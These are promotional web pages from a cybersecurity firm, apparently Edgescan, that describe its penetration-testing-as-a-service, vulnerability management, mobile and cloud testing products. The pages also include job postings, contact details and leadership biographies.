efficiency, and accuracy as it is delivered by a team dedicated to vulnerability detection 24x7x365. Are annual penetration testing services needed or should pentesting be done more often? The answers are “yes” and “yes”. Since penetration testing, or “pentesting”, is designed to find exploitable security vulnerabilities and unintentional data exposure, thereby, helping organizations manage risk, meet compliance mandates, and maintain safe business continuity, it should be conducted on a regular basis. New vulnerabilities and exploits are discovered weekly, if not daily, and, to discover and mitigate the critical ones, pentesting should be executed regularly.So how often should your organization run pentests?As there is no specific, mandatory time frame, it depends on the size and industry type of your organization, your available resources, and the scale of testing you want to conduct. Follow what is best for your organization’s overall security strategy and risk tolerance. How does penetration testing as a service fit into a security program? Pentesting as a Service (PTaaS) should be an integral component to your overall security strategy. While common security technologies and tools like data encryption (AES), network traffic encryption (TLS), next gen firewalls (NGFWs), web application firewalls (WAFs), Secure Web Gateways (SWGs), Data Loss Protection (DLP), and Vulnerability Management (VM) all provide tremendous benefit to any enterprise’s security program, pentesting complements these tools and provides a different, but necessary, function. Pentesting finds exploitable vulnerabilities and unintentional data exposure in hosts, end points, applications, web applications and APIs – functions that these tools do not do.While mostly associated with VM tools, pentesting and vulnerability scanning are not the same.While vulnerability scans provide details on what vulnerabilities are present, penetration tests add more insight by verifying if these vulnerabilities could be leveraged to gain access within the tested environment.Delivered as a service to offer greater scale, agility, and risk awareness versus traditional onsite pentesting tools and processes, PTaaS provides organizations of all sizes with the ability to expose and mitigate vulnerabilities without the need for significant human (penetration tester) resources. Penetration testing: How is it done? While there are many details involved in pentesting, the process can be described in several phases:Planning and reconnaissance – pentest goals are defined, and intelligence is gathered (e.g., email server, network and domain names),Scanning – tools are used to understand how a target responds to intrusions, typically using both static and dynamic analyses (e.g., SQL injections, brute force attacks),Gaining access – attacks are staged to discover the target’s vulnerabilities,Maintaining access – Advanced Persistent Threats (APTs) are imitated to verify if vulnerabilities can be used to maintain access,Analysis and device configuration – results are compiled into a report and then used to configure security device settings (e.g., WAFs, NGFW) before tests are run again.The above process is conducted against externally accessible targets, such as the company’s website, email and domain name servers (DNS) to emulate an outside attacker, as well as against internal targets to imitate a malicious insider or disgruntled employee. Typically, a combination of automated tools and human-led testing and verification processes are used in any pentesting strategy.The Edgescan PTaaS is a hybrid solution that combines the breadth of automation with the depth of human assessment, while integrated with advanced vulnerability management and analytics. PTaaS can be used to assess web applications, APIs and network/cloud devices utilizing risk rating methodologies to prioritize remediation. The platform employs several risk scoring systems (i.e., CVSS, CISA KEV, EPSS) and our own Edgescan Validated Security Score (EVSS) to risk-rate results.The Edgescan PTaaS solution utilizes the Edgescan security team’s extensive technical expertise as well as the entire suite of applications within the Edgescan platform to provide vulnerability assessment, exposure validation, and risk ratings. Edgescan security experts offer battle-hardened security experience combined with countless industry accreditations such as CREST, OSCP, and CEH, to provide clients with deep wisdom and insight to readily resolve their security needs. What are the basics of penetration testing? Penetration testing is where a security analyst simulates or investigates an IT (Information Technology) system (Web Application, Cloud, Network, API) with the aim to find any exploitable vulnerabilities. It is not uncommon to perform penetration tests on the application layer however it also extends into the network, cloud, IoT & API layers. The expected output of such an exercise is a report with detailed information discussing the method of discovery, Severity, Risk and associated remediation recommendations for the discovered vulnerabilities.Examples of such discovered issues could include code-related weaknesses such as an OWASP Top 10 issue, a combination of host and web application weaknesses which result in a breach if combined, an authorization issue which could only be discovered by leveraging a logical weakness. What are the drawbacks of traditional penetration testing? It’s labour intensive and expensive.It does not scale very well.It alone does not keep pace with the rapid pace of change.It’s a point-in-time assessment in a changing world.Traditional penetration testing does not keep pace with changes in your environment or the fact that new vulnerabilities are discovered every day. Today you may look secure, tomorrow a new vulnerability is known about, now you have a problem you did not have yesterday, without any of your systems changing! What are the benefits of penetration testing as a service? Rapid: Retesting on demand to verify mitigation at no extra cost.Efficient: Low administrative overhead and documentation required to deliver the penetration test.Infinite: Continuous, validated assessment with on-demand deep expert-driven penetration testing.Forecastable: Fixed license-based cost.EASM: Continuous monitoring across your entire asset portfolio utilizing our External Attack Surface Management (EASM) solutionEvent alerts: Alert integration into a variety of alerting and ticketing systems thOn-demand: On-demand reporting for any period of time per asset including assertation that the asset underwent a Penetration Test (PTaaS) by certified experts. API based reporting for GRC integration.Reporting: Custom reporting including E.g;, closed vulnerabilities, vulnerability age, posture trending and other security metrics.Break down silos of data: Integration of PTaaS output in the same repository as continuous vulnerability management output.Remediation tracking: Internal Service Level Agreement (SLA) tracking, designed to help ensure high-severity vulnerabilities are mitigated in a timely manner.Prioritization: CISA Exploit Catalogue mapping to help identify high-priority discovered vulnerabilities and aid prioritization. https://www.cisa.gov/known-exploited-vulnerabilities-catalogFocused: Our security analysts are already familiar with the asset allowing for the human expertise to focus on complex and severe vulnerabilities whilst the technical vulnerabilities are discovered by Edgescan scanning technology. What exactly is Penetration Testing as a Service? Penetration Testing as a Service (PTaaS) is not automation, that’s scanning.PTaaS is a hybrid solution that leverages human curiosity for depth and automation for breadth and analytics for verification and risk-based results.PTaaS is a hybrid solution that combines the breadth of automation with the depth of human assessment, while integrated with advanced vulnerability management and analytics; it assesses for vulnerabilities which are not discovered by legacy scanning tools such as authorization or business logic. PTaaS can be used to assess web applications, APIs, cloud assets, and network devices utilizing risk rating methodologies to prioritize remediation.With penetration test services results can be accessed in real-time instead of waiting for a report to be developed. When a discovered vulnerability is fixed, one can retest on-demand without engaging expensive consultants. Reporting is on demand also. Compare this to a traditional Penetration Test. If you performed a Penetration Test in May, you’d get your results in June and that’s it. Once you get your results you will no longer know if those vulnerabilities stay fixed or if new issues pop up. How should a pen tester leverage penetration testing services to prevent a hacker from exploiting a security loophole? Penetration testers and Security experts can utilize Penetration Testing as a Service (PTaaS) as an integral tool in their overall security toolbox. While already familiar with the process and technologies in pentesting, these security team members can gain the advantage of using a testing service providing multiple benefits, including third-party, unbiased assessment, extended knowledge and familiarity with products and technologies, and faster time to discovery and remediation. With this collaborative approach, the effectiveness of identifying and mitigating security exposures, lateral movement loopholes and more is significantly increased. How does pen testing as a service enable businesses to accelerate development, guide compliance, and uncover security insights? Penetration testing as a service (PTaaS) offers greater scale, agility, and risk awareness versus traditional onsite pentesting tools and processes. Penetration testing as a service provides organizations of all sizes with the ability to expose and mitigate vulnerabilities without the need for significant human resources, saving time and costs, while maintaining compliance. This enables IT and SecOps teams to focus on enabling and securing their primary business objectives rather than overextending themselves into areas that are not their forte. By employing a penetration testing as a service, businesses can accelerate their development and operations, meet compliance mandates, as well as quickly and accurately discover and mitigate security vulnerabilities based on business risk without hindering the productivity of their organization. PTaaS solutions also provide metrics for education and preventative security. How can a pen test help IT security leaders make informed decisions to enhance security posture and protect against hackers? Pentesting, whether deployed internally or delivered as a service, should be an integral component to any organization’s overall security strategy. Pentesting complements other security tools (I.e., NGFW, SWG, DLP, WAF) and provides a different, but necessary, function. Pentesting finds exploitable vulnerabilities and unintentional data exposure in hosts, endpoints, applications, web applications, and APIs – functions these tools do not do.The results of a pen test are compiled into a report and then used to configure security device settings (e.g., WAFs, NGFW) before pen tests are run again to verify the appropriate (re)configurations. Based on the report, this last step is key and provides the best insight regarding the effectiveness of the deployed security tools at stopping common vulnerabilities like SQL injections, brute force attacks, APTs and more. As a result, IT Security leaders typically understand:What and where they should ‘fix’ systems first, based on business risk and priorities;if they have the correct security tools in place, andif these tools are configured properly to stop data breaches, lateral threat movement, and more.All of this information helps establish and strengthen an organization’s overall security posture. Never compromise threat protection. Request a Demo ### Home Continuous Security. Validated Results. No Noise. Edgescan delivers risk-prioritized vulnerability intelligence across applications,APIs, and infrastructure with manual validation baked in. PTaaS DAST NVM API MAST ASM Continuous Security. Validated Results. No Noise. Edgescan delivers risk-prioritized vulnerability intelligence across applications, APIs, and infrastructure with manual validation baked in. PTaaS DAST NVM API MAST ASM How Edgescan supports your CTEM program Do you need a pen test?Try PTaaS, it’s significantly better.Learn More About PTAASIs continuous security testing required?We have your back.Learn more about DASTNeed a next-level exposure management program?Our platform approach delivers.Learn MoreProblems with API security testing?We solve that problem.Learn More About APIIs attack surface visibility a problem?We do that, too!Learn More About ASMDo you need Red-Teaming for Dora?We can help!Learn More The Edgescan Platform Continuous security testing and exposure management Edgescan's continuous testing platform strengthens your CTEM program with 100% false-positive-free, validated vulnerability intelligence so you can quickly find and fix risks. Penetration Testing as a Service (PTaaS) We started by addressing the limitations of traditional penetration testing by offering continuous security testing. Edgescan revolutionized the industry by on-demand offensive penetration testing with unlimited retests, expert remediation guidance, proven exploits, validated risk, streamlined reports, and unlimited vulnerability assessments. AI can also optionally be used to assist with priority, strategic decisions and improved vulnerability clarity. Learn about PTaas Dynamic Application Security Testing (DAST) Recognizing the gaps in automated vulnerability scanning alone, we added human + AI layers to our service. This ensured our clients received accurate vulnerability risk, minimizing false positives and helping customers prioritize fixes with proven exploits. AI can be enabled to assist with vulnerability clarity, breach probability, prioritization and improve overall context. Learn about DAST Network Vulnerability Management (NVM) The need for full-stack visibility became clear. Edgescan expanded into network vulnerability intelligence, offering a single validated source of the truth, for better prioritization and mitigation across the entire tech stack. Learn about NVM API Security Testing As APIs became a major attack vector, clients demanded a better way to secure these assets. We added specialized API discovery and testing, giving customers vital protection for this increasingly critical component of the modern application. Learn about API Mobile Application Security Testing (MAST) The explosion of mobile devices in enterprise environments meant security couldn’t be neglected. Edgescan now includes comprehensive mobile application security testing to address the unique threats that mobile apps often present. Learn about MAST Attack Surface Management (ASM) Proactive security requires real-time awareness of potential exposure points. We developed attack surface management (ASM) to empower clients with continuous visibility into shadow IT and rogue assets. Newly discovered assets can be security tested immediately from the Edgescan Platform. Learn about ASM 2025 Vulnerability Statistics Report Celebrating a Decade of Security Insights​ GET THE REPORT 95% Customer Retention CUSTOMER RETENTION 95% Edgescan drives significant improvement to global organizations continuous exposure management and security testing programs. We cut through the noise to deliver validated risk and proven exploits to our returning happy clients. See for yourself... RECOMMENDED BY REVIEWERS 98% 98% of Gartner Peer Insight reviewers would recommend Edgescan. Free Training Courses: Master the Fundamentals of Secure Coding See Courses ### Network Vulnerability Management Network Vulnerability Management Detect vulnerabilities. Reduce time-to-fix issues. A single validated source of the truth, for better prioritization and mitigation across cloud, public internet and private networks alike. Focus on What Matters Most The increased scope and size of vulnerability datasets means it is of paramount importance to concentrate resources on the most critical issues—and the most critical assets—that pose the greatest threat to the organisation. The Edgescan Platform contextualizes risk with validated vulnerability intelligence and a proprietary risk score that incorporates EVSS (Edgescan Validated Security Score), EPSS (Exploit Prediction Scoring System), CISA KEV (CISA Known Exploited Vulnerability Catalog), CVSS (Common Vulnerability Scoring System) and customer dependent factors such as industry or department. Certified Experts Have Your Back Edgescan security experts (OSCP/CREST) are full-time employees able to provide advisory and guidance around vulnerability details and remediation paths to fix issues when they occur. We effectively become an extension of your network and application security teams. Edgescan support means speaking with a Certified Pen Tester, and we are happy to pass that knowledge to you when you most need it. In addition to this, Edgescan’s AI Insights solution provides real-time tactical advice to assist in immediate security posture improvement. Download the NVM datasheet to learn more. DOWNLOAD THE DATASHEET Take a tour of the Edgescan Platform The platform that gives you continuous security testing, validated risk and proven exploits that will 100% improve your exposure management program. Interactive Tour The Edgescan Cloudhook feature keeps pace with the dynamic change that exists within cloud environments. Learn more Dealing with false positives can be costly. ​ The Ponemon Institute reports that the average cost of investigating false positives for an organization is approximately $1.37 million per year.Average Cost of Investigating False Positives $ 0 Benefits of Network Vulnerability Manaement VoIP Service Scanning and Infrastructure Testing​ Scanning by hostname, IP, DNS, AWS Tagging and more for improved correlation and visibility of internal network scanning.​ Certified Experts Edgescan is a CREST-certified organization, combining years of experience with top technical accreditations to deliver industry-recognized service.​ 100% Validated Results False-positive free vulnerability intelligence prevents wasted cycles between security teams. Risk-Based Scoring Traditional vulnerability risk scoring frameworks coupled with Edgescan’s Validated Security Score (EVSS) and Edgescan eXposure Factor (EXF): Allow users to quickly contextualize and prioritize which vulnerabilities to fix first.Edgescan Network Vulnerability Management (NVM) is a software as a service, sold as an annual subscription. Request a Demo AWS internal host tagging allows our clients to tag ephemeral internal hosts in the AWS cloud. Learn more ### Videos and Webinars Video Library Platform Demo Overview Video Spend 10 minutes in our platform and see the power of five integrated solutions that work together to provide verified vulnerabilities, automation at scale, and comprehensive human intelligence.  Watch Demo 45-Minute Recorded Webinar: Panel Discussion with Forrester Join us for a lively discussion that covers a broad range of topics, including:proactive security strategiesrisk-based vulnerability managementbenefits of a platform solution vs standalone solutionsthe possibility of fully automating VMwhich one to choose if you had only one option - DAST or SASTand more! Watch Video 15-Minute Video: EASM + RBVM + PTaaS = Full Stack Protection Experience Edgescan's comprehensive three-step approach to securing your attack surface through a succinct 15-minute presentation spotlighting David Kennefick, Global Engineering Principal. See how Edgescan's fully integrated solutions work together to bring you verified vulnerabilities, scale of automation, and depth of human intelligence – all wrapped up into one unified platform. Learn More Continuous Threat Exposure Management (CTEM) Our CTEM platform operates continuously across all five critical stages, providing organizations with real-time visibility into their complete threat exposure landscape and prioritized remediation pathways. See CTEM Walkthrough Risk-based Vulnerability Management In this self-guided tour you'll see what is occurring in the platform as you experience the remediation process. See VM Walkthrough External Attack Surface Management Our discovery engine runs continuously, and in conjunction with our vulnerability scanning, to help organizations see their digital footprint and exposures. See EASM Walkthrough On-demand Webinars The State of the Market TodayFeaturing IOActive On Demand Assessing and Controlling Risk in Enterprise Architecture On Demand DevOps Best Practices On Demand OWASP Top Ten On Demand Assessing and Controlling Risk in Enterprise Architecture On Demand DevOps Best Practices On Demand OWASP Top Ten On Demand 2022 Vulnerability Statistics Report Preview On Demand DBIR 2021 Fireside On Demand Irish Times | Cyber Security Special On Demand ### Cloudhook Integration Cloudhook Integrations Illuminate and eliminate cloud risk DOWNLOAD THE DATA SHEET Full visibility across your public cloud The Cloudhook integration automatically onboards locations present in various cloud environments into the Edgescan platform giving full visibility across your public cloud. How it works: Provided credentials for a cloud environment, the integration will retrieve all public facing IPs and hostnames on an hourly basis. If the locations are not currently present on the platform then they will be onboarded. A location is considered onboarded when it has been added to a licenced asset and is setup for scanning. A location can be added to a dedicated asset, where there is only one location attached to the asset, or a grouped asset, where there are multiple locations present. If a location was previously onboarded but is no longer present in the cloud environment then scanning will be stopped and the location will be removed from Edgescan. Integration workflow What is required? Some configuration settings need to be agreed upon, and credentials for the specified cloud environments are required. Credentials differ for each environment. Everything else is handled by the integration. How often does it update? Cloudhook runs hourly. Supported cloud environments: AWS: EC2 Elastic IP addresses and Route53 hostnames GCP: External IP addresses and Cloud DNS hostnames Azure: Public IP addresses and DNS zone hostnames Onboarding cloud integrations AWS Onboarding Integration – STS Authentication READ MORE Keeps your External IP addresses and hostnames from Cloud DNS updated as assets in edgescan. READ MORE Microsoft Azure Onboarding Integration READ MORE ### Case Studies Case Studies Continuous Security Testing and Exposure Management See how Edgescan has improved the security posture of organizations like yours. ### Mobile License Mobile Application Testing Complete testing coverage for iOS and Android​ DOWNLOAD THE DATA SHEET Built for mobile apps As organizations increasingly provide mobile applications to enable their remote workforce and boost productivity, their security teams must ensure the safety and integrity of these mobile devices, apps and data. With the rapid and expanding use of mobile apps in the workforce, comes an extended attack surface for cybercriminals to potentially access.Mobile risk assessments discover and examine all assets within your mobile devices and applications to expose vulnerabilities and threats that may jeopardize data security or performance. A single pane of glass view Edgescan Mobile expands its industry leading vulnerability assessment and penetrating testing capabilities into mobile environments, providing complete testing coverage for iOS and Android. Using our unique hybrid approach provides automated vulnerability intelligence coupled with validation and human expertise, we test all relevant mobile components and provide the results in the Edgescan platform with an intuitive ‘single pane of glass’ view. How the process works: Edgescan starts with ingesting the API components used by mobile devices and applications into its platform. Then our vulnerability scanning engine builds a precise profile of each application and runs an assessment of it and at the host-server layer. After the initial scan is completed, a manual penetration test is performed against the API/App, to test for business logic vulnerabilities and vulnerabilities that legacy scanners cannot find. Edgescan then downloads a build of the native mobile application onto our test devices and begins deep testing and device forensics. All results are provided to the Edgescan platform allowing for unlimited retesting and reporting, while ensuring data is safely stored, transmitted, and secured in your mobile environment. Increased coverage.High accuracy.Fast remediation. Features and benefits: Full stack security in one platform that combines API vulnerability assessment, pentesting, and mobile forensic analysis in a unified platform – simplifying daily operations. Only real, prioritized and actionable results are delivered eliminating the false positive ‘noise’ – reducing costs and saving time. Risk-rated results with prioritized remediation. Employs several risk scoring systems (i.e., CVSS, CISA KEV, EPSS) and our own Validated Security Score to risk-rate results. Access to CREST certified security analysts that will test and expedite the effective implementation of your cloud, network and mobile security strategy. Meet compliance – Edgescan is a certified PCI ASV and delivers testing covering the OWASP Top 10, WASC threat classification, CWE/SANS Top 25. Discover and examine all assets within your mobile devices and applications Licensing Edgescan Mobile Assessment is a subscription-based service and includes the following capabilities: Forensic analysis on a physical device Vulnerability assessment on API/Apps and Network components Penetration testing as a service delivered across all components Vulnerability assessments are on demand and unlimited Unlimited retests on scan results Authenticated testing ### Whitepapers Whitepapers Take charge of your organization's security strategy Download whitepapers and gain the insights and strategies to protect your organization from cyber attacks. A Journey into Smart Vulnerability Management War Room A comprehensive resource with the latest best practices, tools, and strategies to fortify your organization's cybersecurity defenses. Download Vulnerability Management Maturity Tool While corporations are advancing to meet the ever expanding cyber threat – there is uncertainty whether they are actually prepared. DOWNLOAD Does a Hybrid Model for Vulnerability Management Make Sense? Discover how a hybrid model can provide the best of both worlds by leveraging the scalability of the cloud and the control of on-premises solutions. DOWNLOAD The 2021 Verizon DBIR Edgescan Analysis Discover how a hybrid model can provide the best of both worlds by leveraging the scalability of the cloud and the control of on-premises solutions. DOWNLOAD Enabling Enterprise Operations with Smart Vulnerability Management An outline of things to consider if you are serious about enabling your operations to integate Smart VM in their existing workflows. DOWNLOAD Security Tool Proliferation and Vendor Consolidation When we look at the actual number of security tools in play for the average enterprise, its apparent that vendor consolidation is top of mind. DOWNLOAD Can You Have a Single Touchstone of Truth for Your Vulnerability Management Program? Getting to a single touchstone of truth could be the difference between continued operations and a cataclysmic security incident. DOWNLOAD Why Does a Single Full Stack Vulnerability Management Solution Matter? In this paper we will consider ten reasons why single, full stack matters but first lets agree on what actually full stack means. DOWNLOAD What is Smart Vulnerability Management and Why Does It Matter? There are a number of ways in which Vulnerability Management can be smart – this paper takes a look at six of them. DOWNLOAD The Evolving Attack Surface The way the attack surface changes is wide and varied – and the chance of human error with every new exposure is equally mixed. DOWNLOAD Resilience to Ransomware There is no silver bullet but you can reduce the risk and impact if you’re unfortunate enough to be faced with a breach. DOWNLOAD ### Enterprise Account Executive Enterprise Account Executive Job Description: Edgescan, a leading cybersecurity company, is seeking an Enterprise Account Executive to support the growth of our enterprise accounts. The Enterprise Account Executive will be responsible for driving revenue growth within our target accounts, managing the sales process from lead generation to deal closure.Key Responsibilities:- Drive revenue growth within enterprise accounts.- Manage the sales process from lead generation to deal closure.- Develop and maintain strong relationships with key decision makers and influencers within our enterprise accounts.- Collaborate with our solutions engineering team to provide technical expertise to prospects and customers.- Conduct product demonstrations and presentations.- Prepare proposals and negotiate pricing and contracts.- Use CRM tools to manage sales pipeline and provide accurate sales forecasting.- Develop and execute account plans to meet and exceed revenue targets.- Stay up to date on industry trends and competitive landscape.Basic Qualifications:- 10+ years of experience in a sales role, preferably in the cybersecurity or technology industry.- Proven track record of meeting and exceeding sales targets.- Experience managing complex sales cycles from lead generation to deal closure.- Strong communication and presentation skills.- Ability to work independently and as part of a team.- Bachelor’s degree in Business Administration, Marketing, or related field.Additional Qualifications:- Experience selling to enterprise accounts in the financial services, healthcare, or technology industry.- Strong understanding of cybersecurity and the threat landscape.- Familiarity with CRM tools such as Salesforce.Traits:- Strong customer/prospect empathy.- Technical aptitude.- Consultative; ability and desire to drive value for customers based on unique needs.- Collaborative; partner across functions.- Intellectually curious; driven to expand cybersecurity domain and professional expertise.- Metrics-driven; ability to translate customer needs into achievable goals and operate well in a data-driven environment.At Edgescan, we believe in providing our employees with opportunities for growth and development. As an Enterprise Account Executive, you will have the opportunity to work with some of the largest and most innovative companies in the world, driving revenue growth and helping our customers protect their critical assets. Join our team today and help us drive growth and innovation in the cybersecurity industry. APPLY NOW ### Solutions Engineer Solutions Engineer Job Description: Edgescan is seeking a Solutions Engineer to support the growth of our account team and partners with technical sales activities. The Solutions Engineer will serve as a subject matter expert for the Edgescan platform, including Penetration Testing as a Service (PTaaS), Web Application and API Testing (DAST), Network Vulnerability Management (VM), and Attack Surface Management (ASM). This position requires supporting highly complex accounts, gaining access and managing relationships with executive level technical staff and decision makers, and understanding market and industry verticals data to provide thought leadership to position the value of the solution. Key Responsibilities:- Leverage third-party and/or the channel to create opportunities and position the solution.- Qualify highly complex sales opportunities in terms of customer technical requirements, competition, decision-making process, and funding.- Present the design and value of proposed solutions and business cases to customers, prospects, management, directors, and C-level executives.- Gain access to and manage relationships with executive level technical staff and decision makers.- Understand market and industry verticals data to provide thought leadership to position the value of the solution.- Serve as a subject matter expert for the Edgescan platform, including PTaaS, DAST, VM, and ASM.- Support highly complex accounts.- Develop and deliver technical presentations and demonstrations.- Conduct product evaluations and proof of concept activities.- Provide technical expertise to the sales team and partners.- Collaborate with Product Management and Engineering to improve the Edgescan platform.- Travel to customer and partner sites as needed. Basic Qualifications:- 5+ years of experience in a technical sales engineering or solutions engineering role.- Strong technical background in cybersecurity, including knowledge of PTaaS, DAST, VM, and ASM.- Experience presenting technical solutions to executive level technical staff and decision makers.- Excellent communication and presentation skills.- Ability to work independently and as part of a team.- Bachelor’s degree in Computer Science, Information Technology, or related field. Additional Qualifications:- Experience working with highly complex accounts.- Experience working with third-party vendors and/or channel partners.- Strong problem-solving skills and the ability to think creatively.- Experience with cloud computing platforms, such as AWS, Azure, or GCP.- Security certifications, such as OWASP, CREST, OSCP, CISSP, or CEH, are a plus. Traits:- Strong customer/prospect empathy.- Technical aptitude.- Consultative; ability and desire to drive value for customers based on unique needs.- Collaborative; partner across functions.- Intellectually curious; driven to expand cybersecurity domain and professional expertise.- Metrics-driven; ability to translate customer needs into achievable goals and operate well in a data-driven environment. At Edgescan, we believe in providing our employees with opportunities for growth and development. As a Solutions Engineer, you will have the opportunity to work with highly complex accounts, gain access to executive level technical staff and decision makers, and present technical solutions to C-level executives. Join our team today and help us drive growth and innovation in the cybersecurity industry. APPLY NOW ### Sales Development Representative Sales Development Representative Job Description: Edgescan is seeking a Sales Development Representative (SDR) to generate new opportunities and pipeline for Account Executives (AE). As an SDR, you will manage outreach, prospecting and lead generation in your territory to ensure we drive business opportunities through the whole sales funnel. As the first line of communication with prospects, ideal SDRs have a strong understanding of the sales process, excelling at researching leads, starting new relationships, and setting our AE's up for success. You should be a quick learner with strong communication skills and have the ability to showcase our offerings in a compelling way. Every potential customer is an opportunity for you to boost top-line revenue growth, customer acquisition levels, and profitability.Key Responsibilities:- Develop and execute cold calling and email campaign strategies to qualify potential customers as a match for our SaaS platform.- Meet specific weekly and monthly goals for qualified opportunities to ensure company revenue objectives are met and report to the Revenue Team.- Build long-term, trusting relationships with prospects to qualify leads as sales opportunities.- Proactively seek new business opportunities in the market.- Set up meetings or calls between (prospective) customers and account executives.Basic Qualifications:- Strong communication skills, both oral and written, in addition to excellent listening skills and a positive, engaging phone presence.- 1-2 years of experience in a sales role (outbound lead generation) in a fast-paced environment.- Bachelor’s degree or equivalent years of experience required.- Self-starter, strong work ethic, and hungry, with a drive for achievement.- A team player who shares information and expertise, promotes team effectiveness by facilitating and building on the ideas of others.Additional Qualifications:- Experience in a start-up SaaS environment and working with enterprises is a plus.- System knowledge in Salesforce, Outreach, ZoomInfo, or similar.- Prior experience as a sales development rep with a track record of achieving sales quotas.Traits:- Customer/prospect empathy.- Technical aptitude.- Consultative; ability and desire to drive value for customers based on unique needs.- Collaborative; partner across functions.- Intellectually curious; driven to expand cybersecurity domain and professional expertise.- Metrics-driven; ability to translate customer needs into achievable goals and operate well in a data-driven environment.Opportunities for growth and development within Edgescan include the possibility of moving into an account executive role or leading a sales team in the future. Previous Sales Development Representatives at Edgescan have also gone on to find success in other departments within the company. APPLY NOW ### Platform Support Technician Platform Support Technician Job Description: We are currently looking for a Platform Support Technician to take point in our industry leading customer support function. You will be an integral part of the Operations team, working closely with managers and team leads, ensuring our customer first approach is maintained throughout.Position Details: The customer support function is part of our Security Operations team, where we strive to improve the security posture of our customers’ assets. Supported by Operations our platform support team acts as the first point of contact for any queries that users of our platform may have and can speedily triage these queries by being a champion for the user, escalate where required, and ensure an efficient and happy journey through the life of the customer query.You will:- Be the first point of contact to our diverse customer base, via email and phone.- Triage support queries and escalate to the relevant team where required.- Become a champion for the user by proactively identifying defects or enhancements in key areas of the user platform.- Take responsibility to ensure a successful customer support experience.- Be flexible to support customers in Europe and the US.- Work as part of a dynamic team in a collabortive environment.- Assist in and suggest any review, update, testing, and implementation of new processes and procedures.You may be fit for this role if you have:- Excellent inter-personal skills.- Excellent English written and oral communication skills.- Customer service oriented.- Ability to manage and prioritize multiple tasks.- Ability to work on your own initiative and within a larger team.- Ability to learn and see common trends in data.- Reasonable flexibility with working hours (some out-of-hours involvement in tasks may be required).- Knowledge and Interest in Information Security.- Must be eligible to work in the EUNice to haves:- B.Sc. or M.Sc. in Computer Science / Information Technology or equivalent Third Level Qualification or a demonstration of similar experience.- A passion for Information Security.- Software development or scripting skills.- Third level qualification.- Previous experience in a technical role.- Previous experience in a customer support role.Eligibility:- Candidates must be authorised to be employed in the EU. APPLY NOW ### Careers Career Opportunities Career Opportunities HighlyCompetitive Salary FlexibleWorking Options Training/EducationFunding HealthInsurance Team SocialNights/Events Plenty of Caffeine, Snacks and Beer! With tens of thousands of web applications, APIs, and endpoints to manage we are often looking for talented people to join our highly dynamic team. We are highly invested in the careers of our team. If you are a engineer or a software dev with a penchant for security, we would love to hear from you. Edgescan is a great place to work, whether in the office or remote. Our corporate office is located in Dublin and our United States office is in New York City. We offer great benefits and a warm and supportive environment for our international and diverse workforce. Currently No Openings Please reach out to careers@edgescan.com for any questions. Sales Development Representative We are currently looking for a Sales Development Representative to generate new opportunities for Account Executives (AE). As an SDR, you will manage outreach, prospecting and lead generation to ensure we drive business opportunities through the whole sales funnel. APPLY TODAY Solutions Engineer Edgescan is seeking a Solutions Engineer to support our account team and partners. You will serve as an expert for the Edgescan platform, including Penetration Testing as a Service, Web Application and API Testing, Network Vulnerability Management, and Attack Surface Management. APPLY TODAY Enterprise Account Executive Edgescan is seeking an Enterprise Account Executive to support the growth of our enterprise accounts. The Enterprise Account Executive will be responsible for driving revenue growth within our target accounts, managing the sales process from lead generation to deal closure. APPLY TODAY Platform Support Technician We are currently looking for a Platform Support Technician to take point in our industry leading customer support function. You will be an integral part of the Operations team, working closely with managers and team leads, ensuring our customer first approach is maintained throughout. APPLY TODAY ### Contact Us Contact Us Call Us Ireland:  +353 (0) 1 681 5330 Europe:  +44 20 3855 5592 US:  +1 332 245 3220 Email Us General:  info@edgescan.com Sales:  sales@edgescan.com "I have been an Edgescan customer for over five years and continue to be impressed by the Edgescan team hitting all the notes so well: innovation, quality, integration, scale, cost customer support, responsiveness, and true partnership." Fortune 1000 Global Media Corporation ### Leadership Leadership Meet Our Executive Team and Board of Directors​ Executive Team Our executive team has a total of almost 70 years of combined experience among them with a range of diverse skills that include cyber security, accounting, software development and engineering just to name a few. Each member of our executive team was hand picked by our founder, Eoin Keary. His goal is to find the best people who can help his company become a cybersecurity juggernaut. Eoin Keary CEO & Founder Linkedin Twitter ABOUT EOIN KEARY Eoin is a veteran of the cyber security industry with 20 years of software development and security experience. Eoin previously held the Global Vice Chair position at the OWASP foundation, and led development of the OWASP Testing and Code Review Guides. Eoin also led an EMEA penetration testing team, leading global enterprise cyber security engagements with a big 4 consultancy for 5 years prior to founding BCC Risk Advisory Ltd and Edgescan in 2011. Eoin was named OWASP Person of the year for 2015 and 2016 for contributions to the industry, and awarded the Tech Excellence Rising Star Award in 2015. Rahim Jina COO & Co-Founder Linkedin Twitter ABOUT RAHIM JINA Rahim has been involved in the cybersecurity industry in various guises. Prior to co-founding Edgescan, Rahim was enjoying the California sun as head of security for a cloud-based VOIP provider based in Los Angeles. Moving back to his native Dublin in 2013 was a difficult decision at the time, but full focus and energy was needed in building and growing Edgescan, which is well placed as part of the exciting tech and cyber scene in Ireland. With a B.Sc from Trinity College Dublin and an M.Sc from Dublin City University, Rahim is also a former Big 4 consultant, where he first met Eoin. Rahim regularly speaks (and is sometimes listened to) at conferences and has been involved with and contributed to organisations such as OWASP for too long. At Edgescan, Rahim is responsible for operational excellence across the entire organisation. Eoin Twohig CFO Linkedin ABOUT EOIN TWOHIG Eoin is a chartered accountant with more than 10 years of experience across a range of industries including SaaS, Gaming, and Financial Services. As CFO, Eoin is responsible for Edgescan’s finance operations. Brian Heavey CTO Linkedin ABOUT BRIAN HEAVEY Brian has been building software for over 20 years and has led teams developing products with combined revenues of over $1B. Brian is passionate about hiring and developing leaders, understanding and implementing new technologies and enhancing client capability and experience. At Edgescan, he has implemented industry best practice with constant enhancement and innovation. Outside of work Brian coaches youths and children in sports as well as running and refusing to call time on his hurling career. Owen Mooney CA Linkedin ABOUT OWEN MOONEY Owen is the technical visionary behind Edgescan and oversees the development team responsible for delivering the Edgescan SaaS platform. Owen has a varied engineering career, delivering software and security products on time and under budget across global industries. Owen attended Trinity College with an MSc in Computer Science and a BA Mod in Theoretical Physics. His academic work involved hacking GPUs to emulate ray tracing techniques in real-time, and using computational methods to calculate the electronic structure of carbon nanotubes and related materials. When not sitting in front of his screen, Owen can be found playing bass guitar and video games. Jim Manico Strategic Technical Advisor Linkedin Twitter ABOUT JIM MANICO Jim Manico is the founder of Manicode Security, where he trains software developers on secure coding and security engineering. He is also an investor/advisor for 10Security, Aiya, MergeBase, Nucleus Security, KSOC, and Inspectiv. Jim is a frequent speaker on secure software practices, is a member of the Java Champion community, and is the author of “Iron-Clad Java: Building Secure Web Applications” from Oracle Press. Jim also volunteers for the OWASP foundation as the project lead for the OWASP Application 